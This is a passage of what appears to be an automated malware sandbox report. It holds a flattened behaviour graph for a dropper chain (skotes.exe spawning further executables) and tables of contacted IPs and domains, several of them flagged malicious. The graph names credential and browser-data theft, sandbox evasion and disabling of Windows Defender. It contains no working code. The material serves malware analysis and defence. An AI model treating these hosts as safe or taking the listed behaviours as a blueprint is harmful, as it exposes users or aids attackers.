185 Tries to detect sandboxes and other dynamic analysis tools (window names) 18->185 187 Machine Learning detection for dropped file 18->187 189 Tries to harvest and steal ftp login credentials 20->189 191 Tries to harvest and steal browser information (history, passwords, etc) 20->191 193 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 20->193 37 taskkill.exe 20->37         started        39 taskkill.exe 20->39         started        41 2 other processes 20->41 file6 signatures7 process8 dnsIp9 83 C:\Users\user\AppData\Local\...\skotes.exe, PE32 22->83 dropped 133 Antivirus detection for dropped file 22->133 135 Detected unpacking (changes PE section rights) 22->135 137 Machine Learning detection for dropped file 22->137 43 skotes.exe 4 25 22->43         started        139 Modifies windows update settings 26->139 141 Disables Windows Defender Tamper protection 26->141 143 Tries to evade debugger and weak emulator (self modifying code) 26->143 155 2 other signatures 26->155 117 185.215.113.37, 49895, 80 WHOLESALECONNECTIONSNL Portugal 28->117 145 Multi AV Scanner detection for dropped file 28->145 147 Hides threads from debuggers 28->147 149 Tries to detect sandboxes / dynamic malware analysis system (registry check) 28->149 151 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 31->151 153 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 35->153 48 conhost.exe 37->48         started        119 youtube.com 142.250.184.238 GOOGLEUS United States 41->119 121 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 GOOGLEUS United States 41->121 123 5 other IPs or domains 41->123 50 firefox.exe 41->50         started        52 firefox.exe 41->52         started        54 conhost.exe 41->54         started        file10 signatures11 process12 dnsIp13 115 185.215.113.43, 49911, 49922, 49985 WHOLESALECONNECTIONSNL Portugal 43->115 95 C:\Users\user\AppData\Local\Temp\...\num.exe, PE32 43->95 dropped 97 C:\Users\user\AppData\...\136916b3ff.exe, PE32 43->97 dropped 99 C:\Users\user\AppData\...\bd214fbd32.exe, PE32 43->99 dropped 101 5 other malicious files 43->101 dropped 199 Creates multiple autostart registry keys 43->199 201 Hides threads from debuggers 43->201 203 Tries to detect sandboxes / dynamic malware analysis system (registry check) 43->203 205 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 43->205 56 8138ba21a1.exe 43->56         started        59 bd214fbd32.exe 43->59         started        61 136916b3ff.exe 43->61         started        63 num.exe 43->63         started        file14 signatures15 process16 signatures17 157 Antivirus detection for dropped file 56->157 159 Multi AV Scanner detection for dropped file 56->159 161 Detected unpacking (changes PE section rights) 56->161 171 2 other signatures 56->171 163 Machine Learning detection for dropped file 59->163 165 Tries to evade debugger and weak emulator (self modifying code) 59->165 167 Hides threads from debuggers 59->167 169 Binary is likely a compiled AutoIt script file 61->169 65 taskkill.exe 61->65         started        67 taskkill.exe 61->67         started        69 taskkill.exe 61->69         started        71 3 other processes 61->71 process18 process19 73 conhost.exe 65->73         started        75 conhost.exe 67->75         started        77 conhost.exe 69->77         started        79 conhost.exe 71->79         started        81 conhost.exe 71->81         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.53.8
 sergei-esenin.com United States
13335 CLOUDFLARENETUS true
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.215.113.37
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
35.244.181.201
 prod.balrog.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
34.117.188.166
 contile.services.mozilla.com United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
104.102.49.254
 steamcommunity.com United States
16625 AKAMAI-ASUS true
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
142.250.184.238
 youtube.com United States
15169 GOOGLEUS false
34.160.144.191
 prod.content-signature-chains.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
services.addons.mozilla.org 151.101.1.91 true
sergei-esenin.com 104.21.53.8 true
contile.services.mozilla.com 34.117.188.166 true
youtube.com 142.250.184.238 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
steamcommunity.com 104.102.49.254 true
ipv4only.arpa 192.0.0.170 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
normandy-cdn.services.mozilla.com 35.201.103.21 true
spirittunek.store unknown unknown
spocs.getpocket.com unknown unknown
licendfilteo.site unknown unknown
time.windows.com unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown
eaglepawnoy.store unknown unknown
bathdoomgaz.store unknown unknown
detectportal.firefox.com unknown unknown
studennotediw.store unknown unknown
mobbipenju.store unknown unknown
normandy.cdn.mozilla.net unknown unknown
shavar.services.mozilla.com unknown unknown
clearancek.site unknown unknown
dissapoiznw.store unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
dissapoiznw.store true
    		unknown
    https://steamcommunity.com/profiles/76561199724331900 true
      		unknown